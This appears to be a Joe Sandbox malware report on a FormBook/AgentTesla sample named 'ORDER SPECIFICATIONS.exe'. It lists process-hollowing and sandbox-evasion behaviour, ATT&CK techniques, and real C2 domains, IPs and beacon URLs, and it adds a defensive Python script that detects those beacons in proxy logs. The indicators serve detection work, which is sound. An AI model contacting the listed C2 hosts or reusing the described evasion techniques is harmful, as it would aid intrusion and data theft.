            Source: Yara match | File source: 0.2.ORDER SPECIFICATIONS.exe.3c2d0a0.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.ORDER SPECIFICATIONS.exe.3c7ccc0.3.raw.unpack, type: UNPACKEDPE

            Remote Access Functionality:

            Yara detected FormBook
            Source: Yara match | File source: 00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.ORDER SPECIFICATIONS.exe.3c2d0a0.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.ORDER SPECIFICATIONS.exe.3c7ccc0.3.raw.unpack, type: UNPACKEDPE

            Mitre Att&ck Matrix

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Scheduled Task/Job1 | Scheduled Task/Job1 | Process Injection612 | Masquerading1 | OS Credential Dumping | Security Software Discovery331 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
            Default Accounts | Shared Modules1 | Boot or Logon Initialization Scripts | Scheduled Task/Job1 | Virtualization/Sandbox Evasion4 | LSASS Memory | Virtualization/Sandbox Evasion4 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools1 | Security Account Manager | Process Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection612 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol13 | SIM Card Swap | Carrier Billing Fraud |
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information1 | LSA Secrets | File and Directory Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information41 | Cached Domain Credentials | System Information Discovery112 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
            External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing13 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |

            Behavior Graph

            Behavior Graph ID: 356492
            Sample: ORDER SPECIFICATIONS.exe
            Startdate: 23/02/2021
            Architecture: WINDOWS
            Score: 100

            Sample start
              DNS/IP: www.shamansmoke.com
              DNS/IP: www.athomecp.com
              DNS/IP: 2 other IPs or domains
              Signature: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
              Signature: Found malware configuration
              Signature: Malicious sample detected (through community Yara rule)
              Signature: 14 other signatures
              started: ORDER SPECIFICATIONS.exe (7)
                dropped: C:\Users\user\AppData\Roaming\LvZiFDk.exe, PE32
                dropped: C:\Users\user\...\LvZiFDk.exe:Zone.Identifier, ASCII
                dropped: C:\Users\user\AppData\Local\...\tmpDA15.tmp, XML
                dropped: C:\Users\...\ORDER SPECIFICATIONS.exe.log, ASCII
                Signature: Injects a PE file into a foreign processes
                started: ORDER SPECIFICATIONS.exe
                  Signature: Modifies the context of a thread in another process (thread injection)
                  Signature: Maps a DLL or memory area into another process
                  Signature: Sample uses process hollowing technique
                  Signature: Queues an APC in another process (thread injection)
                  injected: explorer.exe
                    DNS/IP: www.athomecp.com 154.91.61.105, 80 VPSQUANUS Seychelles
                    DNS/IP: abaplants.com 50.87.196.120, 49729, 80 UNIFIEDLAYER-AS-1US United States
                    DNS/IP: 15 other IPs or domains
                    Signature: System process connects to network (likely due to code injection or exploit)
                    started: chkdsk.exe
                      Signature: Modifies the context of a thread in another process (thread injection)
                      Signature: Maps a DLL or memory area into another process
                      Signature: Tries to detect virtualization through RDTSC time measurements
                      started: cmd.exe (1)
                        started: conhost.exe
                started: schtasks.exe (1)
                  started: conhost.exe
                started: ORDER SPECIFICATIONS.exe


            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            Source | Detection | Scanner | Label | Link
            ORDER SPECIFICATIONS.exe | 31% | Virustotal |  | Browse
            ORDER SPECIFICATIONS.exe | 15% | ReversingLabs | Win32.Trojan.AgentTesla |
            ORDER SPECIFICATIONS.exe | 100% | Joe Sandbox ML |  |

            Dropped Files

            Source | Detection | Scanner | Label | Link
            C:\Users\user\AppData\Roaming\LvZiFDk.exe | 100% | Joe Sandbox ML |  |
            C:\Users\user\AppData\Roaming\LvZiFDk.exe | 15% | ReversingLabs | Win32.Trojan.AgentTesla |

            Unpacked PE Files

            Source | Detection | Scanner | Label | Link | Download
            5.2.ORDER SPECIFICATIONS.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |  | Download File

            Domains

            No Antivirus matches

            URLs

            The report lists the "URL Reputation" verdict three times for each URL it applies to; those rows are collapsed into one line here and marked (listed 3x).

            Source | Detection | Scanner | Label
            http://www.abaplants.com/owws/?FZA=E2uPX13Kd8eziNpXwTixT+siYJwH/w0JmCiJBsiXejl5IKklxd2VA8+t7/1UF0B3bHAe&GzrX=Bxo0src | 0% | Avira URL Cloud | safe
            http://www.jiyu-kobo.co.jp/Micr | 0% | Avira URL Cloud | safe
            http://www.softwaresreports.info/owws/?FZA=5jCx8TJ67BDPxitFKTiPzVbAv5V4WmfLvz0iUotKb81cdHhoP6D4U31cAoF9J0eWw3xa&GzrX=Bxo0src | 0% | Avira URL Cloud | safe
            http://www.fontbureau.comaYn | 0% | Avira URL Cloud | safe
            http://www.founder.com.cn/cn/bThe | 0% | URL Reputation (listed 3x) | safe
            http://www.jiyu-kobo.co.jp/dn | 0% | Avira URL Cloud | safe
            http://schemas.microsoft.nh | 0% | Avira URL Cloud | safe
            https://www.casar.com/assunto/organizacao/ | 0% | Avira URL Cloud | safe
            http://www.tiro.comBR | 0% | Avira URL Cloud | safe
            https://www.casar.com/assunto/casamentos/decoracao-de-casamento/ | 0% | Avira URL Cloud | safe
            http://www.tiro.com | 0% | URL Reputation (listed 3x) | safe
            https://www.casar.com/assunto/lua-de-mel-2/ | 0% | Avira URL Cloud | safe
            http://en.wX | 0% | Avira URL Cloud | safe
            http://www.goodfont.co.kr | 0% | URL Reputation (listed 3x) | safe
            http://www.raphaelyejesiel.com/owws/?FZA=Ng1hVjXym9Qjh/39zAZuuRZY5wWd2+1a+DNcin6p0h8GUL41G3Uc3DOSlbUNOeobFB2Q&GzrX=Bxo0src | 0% | Avira URL Cloud | safe
            www.athomecp.com/owws/ | 0% | Avira URL Cloud | safe
            http://www.sajatypeworks.com | 0% | URL Reputation (listed 3x) | safe
            http://www.typography.netD | 0% | URL Reputation (listed 3x) | safe
            http://www.founder.com.cn/cn/cThe | 0% | URL Reputation (listed 3x) | safe
            http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation (listed 3x) | safe
            https://www.casar.com | 0% | Avira URL Cloud | safe
            http://fontfabrik.com | 0% | URL Reputation (listed 3x) | safe
            http://www.assemble-4u.com/owws/?FZA=tHbMDDeadmVNgKYcreuncRwf7boUCKl6MNzrWMM5Jrdb4IpAp8+CGbWYAVkD3n9oZQag&GzrX=Bxo0src | 0% | Avira URL Cloud | safe
            https://www.casar.com/assunto/noivas/dicas-para-noivas/ | 0% | Avira URL Cloud | safe
            http://www.galapagosdesign.com/DPlease | 0% | URL Reputation (listed 3x) | safe
            http://www.sandoll.co.kr | 0% | URL Reputation (listed 3x) | safe
            http://www.sandoll.co.krF | 0% | Avira URL Cloud | safe
            http://www.urwpp.deDPlease | 0% | URL Reputation (listed 3x) | safe
            http://www.zhongyicts.com.cn | 0% | URL Reputation (listed 3x) | safe
            http://www.sakkal.com | 0% | URL Reputation (listed 3x) | safe
            http://www.tiro.comxR | 0% | Avira URL Cloud | safe
            http://www.fonts.come | 0% | Avira URL Cloud | safe
            http://www.denisekohli.com/owws/?FZA=lwHO/uUGh/aXRG65LDVUqOi7qNbSmHJrcCZCAEgZXo9YpRM01PmoothBQXBavnYq4fuq&GzrX=Bxo0src | 0% | Avira URL Cloud | safe
            https://www.casar.com/assunto/casamentos/casamentos-reais/ | 0% | Avira URL Cloud | safe
            http://www.jiyu-kobo.co.jp/jp/ | 0% | URL Reputation (listed 3x) | safe
            https://www.casar.com/assunto/cha-de-panela/ | 0% | Avira URL Cloud | safe
            http://www.tiro.comtn | 0% | Avira URL Cloud | safe
            http://www.fonts.comX | 0% | Avira URL Cloud | safe
            http://www.your-new-body-plan.com/owws/?FZA=wQPVVaqxY2IiVfQZkyRmW3q13fIzlgC5jJ34SIKwtgCZdzYlbOYBx3wkbgC3baC7Oc7O&GzrX=Bxo0src | 0% | Avira URL Cloud | safe
            https://www.casar.com/assunto/noivas/vestidos-de-noiva/ | 0% | Avira URL Cloud | safe
            http://www.carterandcone.coml | 0% | URL Reputation (listed 3x) | safe
            http://www.founder.com.cn/cn/ | 0% | URL Reputation (listed 3x) | safe
            http://www.founder.com.cn/cn | 0% | URL Reputation (listed 3x) | safe
            http://www.fontbureau.comoitu | 0% | URL Reputation (listed 3x) | safe
            http://www.jiyu-kobo.co.jp/ico | 0% | Avira URL Cloud | safe
            http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation (listed 3x) | safe
            http://www.sajatypeworks.coma-d | 0% | Avira URL Cloud | safe
            http://www.hostsnc.com/owws/?FZA=4P1MPend6t3dRr+zrFZAhnBbaZyC76urNt6lzZx4zgRAaIR2wDCeIn43mJ71sHhZDUem&GzrX=Bxo0src | 0% | Avira URL Cloud | safe
            http://www.fontbureau.comon | 0% | Avira URL Cloud | safe

            Every URL above, including the actual C2 beacons (the /owws/?FZA=...&GzrX=Bxo0src entries), is rated "safe" at 0% by the URL scanners; URL reputation is a weak signal for freshly registered or compromised FormBook C2 domains. The font-foundry URLs with trailing garbage (fontbureau, tiro, sajatypeworks, urwpp, founder, sandoll and similar) are strings carved from font metadata in process memory, not traffic.

            Domains and IPs

            Contacted Domains

            The "Antivirus Detection" column of the report is empty for every row and is omitted below.

            Name | IP | Active | Malicious | Reputation
            abaplants.com | 50.87.196.120 | true | true | unknown
            www.hostsnc.com | 156.240.32.114 | true | true | unknown
            www.athomecp.com | 154.91.61.105 | true | true | unknown
            www.your-new-body-plan.com | 34.90.54.238 | true | true | unknown
            denisekohli.com | 34.102.136.180 | true | true | unknown
            softwaresreports.info | 34.102.136.180 | true | true | unknown
            104.233.225.185.cname-url.com | 170.106.171.56 | true | true | unknown
            assemble-4u.com | 13.57.130.120 | true | true | unknown
            shops.myshopify.com | 23.227.38.74 | true | false | unknown
            www.raphaelyejesiel.com | 54.85.86.211 | true | true | unknown
            www.softwaresreports.info | unknown | unknown | true | unknown
            www.gdzas08.cloud | unknown | unknown | true | unknown
            www.cyjulebu.com | unknown | unknown | true | unknown
            www.shamansmoke.com | unknown | unknown | true | unknown
            www.abaplants.com | unknown | unknown | true | unknown
            www.denisekohli.com | unknown | unknown | true | unknown
            www.assemble-4u.com | unknown | unknown | true | unknown

            Contacted URLs

            Name | Malicious | Antivirus Detection | Reputation
            http://www.abaplants.com/owws/?FZA=E2uPX13Kd8eziNpXwTixT+siYJwH/w0JmCiJBsiXejl5IKklxd2VA8+t7/1UF0B3bHAe&GzrX=Bxo0src | true | Avira URL Cloud: safe | unknown
            http://www.softwaresreports.info/owws/?FZA=5jCx8TJ67BDPxitFKTiPzVbAv5V4WmfLvz0iUotKb81cdHhoP6D4U31cAoF9J0eWw3xa&GzrX=Bxo0src | true | Avira URL Cloud: safe | unknown
            http://www.raphaelyejesiel.com/owws/?FZA=Ng1hVjXym9Qjh/39zAZuuRZY5wWd2+1a+DNcin6p0h8GUL41G3Uc3DOSlbUNOeobFB2Q&GzrX=Bxo0src | true | Avira URL Cloud: safe | unknown
            www.athomecp.com/owws/ | true | Avira URL Cloud: safe | low
            http://www.assemble-4u.com/owws/?FZA=tHbMDDeadmVNgKYcreuncRwf7boUCKl6MNzrWMM5Jrdb4IpAp8+CGbWYAVkD3n9oZQag&GzrX=Bxo0src | true | Avira URL Cloud: safe | unknown
            http://www.denisekohli.com/owws/?FZA=lwHO/uUGh/aXRG65LDVUqOi7qNbSmHJrcCZCAEgZXo9YpRM01PmoothBQXBavnYq4fuq&GzrX=Bxo0src | true | Avira URL Cloud: safe | unknown
            http://www.your-new-body-plan.com/owws/?FZA=wQPVVaqxY2IiVfQZkyRmW3q13fIzlgC5jJ34SIKwtgCZdzYlbOYBx3wkbgC3baC7Oc7O&GzrX=Bxo0src | true | Avira URL Cloud: safe | unknown
            http://www.hostsnc.com/owws/?FZA=4P1MPend6t3dRr+zrFZAhnBbaZyC76urNt6lzZx4zgRAaIR2wDCeIn43mJ71sHhZDUem&GzrX=Bxo0src | true | Avira URL Cloud: safe | unknown
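            The eight contacted C2 URLs share one structure: the path /owws/, a long FZA= value that differs per request, and a constant GzrX=Bxo0src, spread across a rotating set of domains (several of which never resolved, as the Contacted Domains table shows). The Python script below is an added example, not part of the Joe Sandbox report or of the sample; it turns that structure into a proxy-log check that matches on path and parameter names rather than only on the domain list, so a beacon to a domain the sandbox did not happen to see is still flagged. The log line format, the sample log lines and the www.example-rotated.net domain are constructed for the example; the FZA value is treated as opaque and is not decoded.

```python
"""
Flag FormBook-style C2 beacons in proxy logs.

Added example, not part of the Joe Sandbox report. The indicators below are
copied from the report (the /owws/ path and the FZA / GzrX query parameters
shared by every contacted C2 URL, plus the contacted domains). The log
format and the sample lines are constructed for illustration.
"""
import re
from urllib.parse import parse_qs, urlsplit

# From the report: every C2 URL uses this path and these parameter names
C2_PATH = "/owws/"
C2_PARAMS = ("FZA", "GzrX")
C2_GZRX_VALUE = "Bxo0src"

# Malicious contacted domains listed in the report ("www." prefix stripped)
C2_DOMAINS = {
    "abaplants.com", "hostsnc.com", "athomecp.com", "your-new-body-plan.com",
    "denisekohli.com", "softwaresreports.info", "assemble-4u.com",
    "raphaelyejesiel.com", "gdzas08.cloud", "cyjulebu.com", "shamansmoke.com",
}

# Constructed log format (assumption): "<timestamp> <client-ip> <method> <url> <status>"
LOG_RE = re.compile(r"^(\S+)\s+(\S+)\s+(GET|POST)\s+(\S+)\s+(\d{3})$")


def classify_url(url: str) -> dict:
    """Return which of the report's C2 traits a URL exhibits."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    host = parts.hostname or ""
    if host.startswith("www."):
        host = host[4:]
    qs = parse_qs(parts.query)  # FZA value is opaque; only its presence is checked
    return {
        "host": host,
        "known_domain": host in C2_DOMAINS,
        "path_match": parts.path == C2_PATH,
        "param_match": all(p in qs for p in C2_PARAMS),
        "gzrx_match": qs.get("GzrX", [None])[0] == C2_GZRX_VALUE,
    }


def is_c2_beacon(url: str) -> bool:
    """A hit is either the full structural pattern (path + both parameters),
    which survives domain rotation, or a known C2 domain with the C2 path,
    which catches the parameter-less POST to /owws/ seen in the report."""
    t = classify_url(url)
    return (t["path_match"] and t["param_match"]) or (t["known_domain"] and t["path_match"])


def scan_log(lines) -> list:
    """Return (client_ip, host, url) for every line that looks like a beacon."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not in the expected format; skip rather than guess
        _, client, _, url, _ = m.groups()
        if is_c2_beacon(url):
            hits.append((client, classify_url(url)["host"], url))
    return hits


# Constructed sample log lines (not from the report); line 3 uses a domain the
# report never saw, to show that the structural match still fires.
SAMPLE_LOG = [
    "2021-02-22T10:01:02Z 10.0.0.5 GET http://www.abaplants.com/owws/?FZA=E2uPX13Kd8eziNpXwTixT+siYJwH/w0JmCiJBsiXejl5IKklxd2VA8+t7/1UF0B3bHAe&GzrX=Bxo0src 200",
    "2021-02-22T10:01:09Z 10.0.0.5 POST http://www.athomecp.com/owws/ 200",
    "2021-02-22T10:01:15Z 10.0.0.5 GET http://www.example-rotated.net/owws/?FZA=AAAA&GzrX=Bxo0src 404",
    "2021-02-22T10:02:00Z 10.0.0.7 GET https://www.casar.com/assunto/organizacao/ 200",
    "2021-02-22T10:02:30Z 10.0.0.7 GET http://www.fontbureau.com/designers 200",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

            Running the script reports the three beacons (abaplants.com, athomecp.com and the rotated domain) and ignores the casar.com and fontbureau.com requests. The domain list should still be fed into the proxy or DNS blocklist; the structural match is the part that keeps working once the actor moves to the next domain in the rotation.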

            URLs from Memory and Binaries

            Memory-dump sources that repeat across many rows are abbreviated as follows:
            [A] = ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp
            [B] = explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp
            [C] = chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp
            [D] = ORDER SPECIFICATIONS.exe, 00000000.00000003.236733624.00000000059E4000.00000004.00000001.sdmp
            [E] = ORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmp
            "URL Reputation: safe (listed 3x)" stands for the three identical URL Reputation verdicts the report prints per URL.

            Name | Source | Malicious | Antivirus Detection | Reputation
            http://www.fontbureau.com/designersG | [A], [B] | false | | high
            http://www.fontbureau.com/designers/? | [A], [B] | false | | high
            http://www.jiyu-kobo.co.jp/Micr | [D] | false | Avira URL Cloud: safe | unknown
            http://www.fontbureau.comaYn | ORDER SPECIFICATIONS.exe, 00000000.00000003.253563451.00000000059E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.founder.com.cn/cn/bThe | [A], [B] | false | URL Reputation: safe (listed 3x) | unknown
            http://www.jiyu-kobo.co.jp/dn | [D] | false | Avira URL Cloud: safe | unknown
            http://schemas.microsoft.nh | ORDER SPECIFICATIONS.exe, 00000000.00000002.261901918.0000000007260000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            https://www.casar.com/assunto/organizacao/ | [C] | false | Avira URL Cloud: safe | unknown
            http://www.fontbureau.com/designers? | [A], [B] | false | | high
            http://www.tiro.comBR | ORDER SPECIFICATIONS.exe, 00000000.00000003.233440991.00000000059FB000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            https://www.casar.com/assunto/casamentos/decoracao-de-casamento/ | [C] | false | Avira URL Cloud: safe | unknown
            http://www.tiro.com | [B] | false | URL Reputation: safe (listed 3x) | unknown
            http://www.fontbureau.com/designers | [B] | false | | high
            https://www.casar.com/assunto/lua-de-mel-2/ | [C] | false | Avira URL Cloud: safe | unknown
            http://en.wX | ORDER SPECIFICATIONS.exe, 00000000.00000003.232661881.000000000121D000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.goodfont.co.kr | [A], [B] | false | URL Reputation: safe (listed 3x) | unknown
            https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css | [E] | false | | high
            http://www.sajatypeworks.com | [A], ORDER SPECIFICATIONS.exe, 00000000.00000003.233207946.00000000059FB000.00000004.00000001.sdmp, [B] | false | URL Reputation: safe (listed 3x) | unknown
            http://www.typography.netD | [A], [B] | false | URL Reputation: safe (listed 3x) | unknown
            http://www.founder.com.cn/cn/cThe | [A], [B] | false | URL Reputation: safe (listed 3x) | unknown
            http://www.galapagosdesign.com/staff/dennis.htm | [A], [B] | false | URL Reputation: safe (listed 3x) | unknown
            https://www.casar.com | [C] | false | Avira URL Cloud: safe | unknown
            http://fontfabrik.com | [A], [B] | false | URL Reputation: safe (listed 3x) | unknown
            https://embed.typeform.com/embed.js | [C] | false | | high
            https://connect.facebook.net/en_US/fbevents.js | [C] | false | | high
            https://casarpontocom.zendesk.com/hc/pt-br | [C] | false | | high
            https://www.casar.com/assunto/noivas/dicas-para-noivas/ | [C] | false | Avira URL Cloud: safe | unknown
            http://www.galapagosdesign.com/DPlease | [A], [B] | false | URL Reputation: safe (listed 3x) | unknown
            http://www.fonts.com | [A], [B] | false | | high
            http://www.sandoll.co.kr | [A], [B] | false | URL Reputation: safe (listed 3x) | unknown
            http://www.sandoll.co.krF | ORDER SPECIFICATIONS.exe, 00000000.00000003.234237194.00000000059E6000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.urwpp.deDPlease | [A], [B] | false | URL Reputation: safe (listed 3x) | unknown
            http://www.zhongyicts.com.cn | [A], [B] | false | URL Reputation: safe (listed 3x) | unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | [E] | false | | high
            http://www.pinterest.com/casarpontocom | [C] | false | | high
            http://www.sakkal.com | [A], [B] | false | URL Reputation: safe (listed 3x) | unknown
            http://www.tiro.comxR | ORDER SPECIFICATIONS.exe, 00000000.00000003.233419468.00000000059FB000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.apache.org/licenses/LICENSE-2.0 | [A], [B] | false | | high
            http://www.fontbureau.com | [A], [B] | false | | high
            http://www.fonts.come | ORDER SPECIFICATIONS.exe, 00000000.00000003.233155052.00000000059FB000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            https://www.casar.com/assunto/casamentos/casamentos-reais/ | [C] | false | Avira URL Cloud: safe | unknown
            https://www.youtube.com/casarpontocom | [C] | false | | high
            http://www.jiyu-kobo.co.jp/jp/ | [D] | false | URL Reputation: safe (listed 3x) | unknown
            https://www.casar.com/assunto/cha-de-panela/ | [C] | false | Avira URL Cloud: safe | unknown
            http://www.tiro.comtn | ORDER SPECIFICATIONS.exe, 00000000.00000003.233440991.00000000059FB000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js | [C] | false | | high
            https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js | [C] | false | | high
            http://www.fonts.comX | ORDER SPECIFICATIONS.exe, 00000000.00000003.233155052.00000000059FB000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            https://www.casar.com/assunto/noivas/vestidos-de-noiva/ | [C] | false | Avira URL Cloud: safe | unknown
            http://www.carterandcone.coml | [A], [B] | false | URL Reputation: safe (listed 3x) | unknown
            http://www.founder.com.cn/cn/ | ORDER SPECIFICATIONS.exe, 00000000.00000003.235177312.00000000059E4000.00000004.00000001.sdmp | false | URL Reputation: safe (listed 3x) | unknown
            http://www.fontbureau.com/designers/cabarga.htmlN | [A], [B] | false | | high
            http://www.founder.com.cn/cn | [A], ORDER SPECIFICATIONS.exe, 00000000.00000003.234915943.00000000059E4000.00000004.00000001.sdmp, ORDER SPECIFICATIONS.exe, 00000000.00000003.234874416.0000000005A1D000.00000004.00000001.sdmp, [B] | false | URL Reputation: safe (listed 3x) | unknown
            http://www.fontbureau.com/designers/frere-jones.html | [A], [B] | false | | high
            http://www.fontbureau.comoitu | ORDER SPECIFICATIONS.exe, 00000000.00000003.253563451.00000000059E0000.00000004.00000001.sdmp | false | URL Reputation: safe (listed 3x) | unknown
            http://www.jiyu-kobo.co.jp/ico | [D] | false | Avira URL Cloud: safe | unknown
            http://www.jiyu-kobo.co.jp/ | [A], [D], [B] | false | (remaining columns cut off in the page)

            None of these memory strings is marked malicious. The font-foundry URLs come from font metadata loaded into the sample and explorer.exe; the casar.com, typeform, facebook and maxcdn strings sit in the memory of chkdsk.exe, the hollowed process the report's signatures describe, and are page content rather than beacons. The C2 indicators for this sample are the /owws/ URLs in the Contacted URLs table, not this list.
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://www.sajatypeworks.coma-dORDER SPECIFICATIONS.exe, 00000000.00000003.233044903.00000000059FB000.00000004.00000001.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://www.fontbureau.com/designers8ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpfalse
                                                                                    high
                                                                                    http://www.fontbureau.comonORDER SPECIFICATIONS.exe, 00000000.00000003.253563451.00000000059E0000.00000004.00000001.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://instagram.com/casarpontocomchkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpfalse
                                                                                      high

                                                                                      Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
170.106.171.56 | unknown | Singapore | 132203 | TENCENT-NET-AP-CN Tencent Building Kejizhongyi Avenue, CN | true
34.90.54.238 | unknown | United States | 15169 | GOOGLE, US | true
50.87.196.120 | unknown | United States | 46606 | UNIFIEDLAYER-AS-1, US | true
54.85.86.211 | unknown | United States | 14618 | AMAZON-AES, US | true
34.102.136.180 | unknown | United States | 15169 | GOOGLE, US | true
156.240.32.114 | unknown | Seychelles | 328608 | Africa-on-Cloud-AS, ZA | true
13.57.130.120 | unknown | United States | 16509 | AMAZON-02, US | true
154.91.61.105 | unknown | Seychelles | 62468 | VPSQUAN, US | true

                                                                                      General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 356492
Start date: 23.02.2021
Start time: 08:55:55
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 41s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: ORDER SPECIFICATIONS.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@12/4@12/8
EGA Information: Failed
HDC Information:
• Successful, ratio: 10.8% (good quality ratio 9.4%)
• Quality average: 71.2%
• Quality standard deviation: 33.6%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
                                                                                      • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                      • TCP Packets have been reduced to 100
                                                                                      • Excluded IPs from analysis (whitelisted): 104.42.151.234, 51.103.5.186, 204.79.197.200, 13.107.21.200, 93.184.220.29, 51.104.139.180, 168.61.161.212, 92.122.145.220, 13.64.90.137, 23.210.248.85, 92.122.213.194, 92.122.213.247, 2.20.142.210, 2.20.142.209, 8.253.95.121, 8.248.145.254, 67.26.83.254, 67.27.157.126, 8.248.123.254, 20.54.26.129
                                                                                      • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, cs9.wac.phicdn.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, client.wns.windows.com, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, vip2-par02p.wns.notify.trafficmanager.net
                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.

